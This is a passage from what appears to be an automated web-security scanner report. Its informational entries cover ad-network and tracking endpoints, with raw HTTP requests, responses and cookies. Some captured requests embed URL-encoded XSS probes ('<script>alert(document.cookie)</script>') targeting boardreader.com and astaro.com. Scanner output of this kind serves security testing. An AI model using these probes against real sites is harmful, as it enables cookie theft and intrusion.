GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

27.4. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033.24

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

27.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.91

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

27.6. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.msn-dm/B2343920.67

Request

Response

27.7. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4406.Orbitzcom/B5147944.11

Request

Response

27.8. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4406.Orbitzcom/B5147944.4

Request

Response

27.9. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4406.Orbitzcom/B5147944.5

Request

Response

27.10. http://ad.doubleclick.net/adi/N553.msn.com/B5114832.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.msn.com/B5114832.2

Request

Response

27.11. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.5

Request

Response

27.12. http://ad.doubleclick.net/adi/dmd.ehow/computers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/dmd.ehow/computers

Request

Response

27.13. http://ad.doubleclick.net/adi/dmd.ehow/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/dmd.ehow/homepage

Request

Response

27.14. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=;

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Tue, 01 Feb 2011 15:29:56 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

27.15. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Request

Response

27.16. https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.testandtarget.omniture.com
Path:	/scripts/jquery/jquery.js

Request

Response

27.17. https://admin.testandtarget.omniture.com/skins/omniture/terms_of_use.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/terms_of_use.html

Request

GET /skins/omniture/terms_of_use.html HTTP/1.1
Host: admin.testandtarget.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; safariAlertWasDisplayed=1; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; v1stsp=C92D8F8B772AFF13; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Test & Target
Cache-Control: no-cache
Content-Type: text/html
Date: Wed, 02 Feb 2011 19:18:10 GMT
Expires: Wed, 31 Dec 1969 19:00:00 EST
Pragma: No-cache
Accept-Ranges: bytes
ETag: W/"13561-1288895544000"
Connection: close
Last-Modified: Thu, 04 Nov 2010 18:32:24 GMT
Content-Length: 13561

<html>

<body>
<pre>
ADOBE TERMS OF USE
Your access to this website (the "Site"), Content (as defined below), and/or the applications and services provided by Adobe Systems Incorporated, including its
...[SNIP]...

27.18. http://amihackerproof.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amihackerproof.com
Path:	/

Request

GET / HTTP/1.1
Host: amihackerproof.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.19. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/ActivityServer.bs

Request

Response

27.20. http://dillerdesign.com/experiment/DD_belatedPNG/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dillerdesign.com
Path:	/experiment/DD_belatedPNG/

Request

GET /experiment/DD_belatedPNG/ HTTP/1.1
Host: dillerdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.21. http://ds.addthis.com/red/psi/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/p.json

Request

GET /red/psi/p.json?callback=_ate.ad.hpr HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=4d1ec56b7612a62c; dt=X; psc=4; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296659685.60|1296659685.66; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; bt=;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 02 Feb 2011 16:18:48 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 04 Mar 2011 16:18:48 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296659685.60|1296663528.19A|1296659685.66; Domain=.addthis.com; Expires=Fri, 01-Feb-2013 12:06:16 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 02 Feb 2011 16:18:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 16:18:48 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

27.22. http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.ehow.com/p.json

Request

GET /red/psi/sites/www.ehow.com/p.json HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=4d1ec56b7612a62c; dt=X; psc=4; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296659685.60|1296659685.66; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; bt=;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 02 Feb 2011 16:18:48 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 04 Mar 2011 16:18:48 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 02 Feb 2011 16:18:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 16:18:48 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

27.23. http://fast.dm.demdex.net/dm-dest.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fast.dm.demdex.net
Path:	/dm-dest.html

Request

GET /dm-dest.html?bizo=1&bizovalidttl=7& HTTP/1.1
Host: fast.dm.demdex.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DexLifeCycle=NEW01296659480101778|MTA4MDQ9MTo3NjI=|MA==|MA==|NjU4OTE0ODA=|MA==|MTA4MDQtMA==; demdex=dv2:eLHun3HgfhcbrRmH3JUk3A==; dm=dv2:eLHun3HgfhcbrRmH3JUk3A==

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "f9ce87681c648049e7370d85cd2eefb8:1296243233"
Last-Modified: Fri, 28 Jan 2011 19:33:52 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
Cache-Control: max-age=3600
Date: Wed, 02 Feb 2011 15:11:21 GMT
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
Content-Length: 13769


<html>
<head>
<script type="text/javascript">

var Demdex = {
   DEMDEX_NET: ".demdex.net",
   _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
   cbmacros
...[SNIP]...

27.24. http://hit.clickaider.com/pv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hit.clickaider.com
Path:	/pv

Request

GET /pv HTTP/1.1
Host: hit.clickaider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=d269a5c2-241228395777; clickdata=eNpVys0KwjAQBOB3WSjoQdNsbGK2iAfxQdJmiwX7QxJREd%2FdVkHxNvPNOJL0iCRzAttoI3O9XRVQOipmNgSRo2ceoWxJlZGQIMW5SLRaG6MKO6kiaP8Yrfpw4AamJC3BKaWRhKguYRTxNFzFRs1TQcB9Cvf3Lc9%2Fv8EFH9h5Dut66IQfOtf2Ajvfr3tO4oa454obkyFm6pipQ6xDO6YpuzOHtJDLycQXdaOttlt02u8klM%2FnCzEVSdE%3D; vid=3e136b53-42127475201;

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 06:55:00 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

27.25. http://hostedusa3.whoson.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hostedusa3.whoson.com
Path:	/

Request

GET / HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File not found
Content-Type: text/html
Content-Length: 52

<html><body><p>File does not exist</p></body></html>

27.26. http://hostedusa3.whoson.com/include.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hostedusa3.whoson.com
Path:	/include.js

Request

GET /include.js HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 315

document.write("<div style='text-align:center;padding:5px'>WhosOn Live Stats & Live Chat services are not active for this site. Please remove the tracking code or re-activate your service. Please
...[SNIP]...

27.27. http://hostedusa3.whoson.com/invite.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hostedusa3.whoson.com
Path:	/invite.js

Request

GET /invite.js HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.28. http://hostedusa3.whoson.com/poll.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hostedusa3.whoson.com
Path:	/poll.gif

Request

GET /poll.gif HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File not found
Content-Type: text/html
Content-Length: 52

<html><body><p>File does not exist</p></body></html>

27.29. http://hostedusa3.whoson.com/stat.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hostedusa3.whoson.com
Path:	/stat.gif

Request

GET /stat.gif HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File not found
Content-Type: text/html
Content-Length: 52

<html><body><p>File does not exist</p></body></html>

27.30. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.31. http://kona10.kontera.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kona10.kontera.com
Path:	/

Request

GET / HTTP/1.1
Host: kona10.kontera.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265;

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 85
Connection: close

<html><head><title>Not Found</title></head><body><h1>404 Not Found</h1></body></html>

27.32. http://kona5.kontera.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kona5.kontera.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 85
Connection: close

<html><head><title>Not Found</title></head><body><h1>404 Not Found</h1></body></html>

27.33. http://local.msn.com/ten-day.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/ten-day.aspx

Request

GET /ten-day.aspx?q=New York-NY&zip=10038 HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:57 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

27.34. http://local.msn.com/weather.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/weather.aspx

Request

GET /weather.aspx?q=New York-NY&zip=10038 HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:55 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

27.35. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=2074&ref2=elqNone&tzo=360&ms=421 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.astaro.com/newsletter?uid=90d583b---24cb6%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E78300d896e1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=832D38EEC08246AA9E81E93E71DE673D; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 13:54:58 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

27.36. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Request

Response

27.37. http://r.nexac.com/e/getdata.xgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.nexac.com
Path:	/e/getdata.xgi

Request

GET /e/getdata.xgi HTTP/1.1
Host: r.nexac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd;

Response

HTTP/1.1 200 OK
Connection: close
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
X-Powered-By: Jigawatts
Content-type: text/html
Date: Wed, 02 Feb 2011 15:40:12 GMT
Server: lighttpd/1.4.18
Content-Length: 30

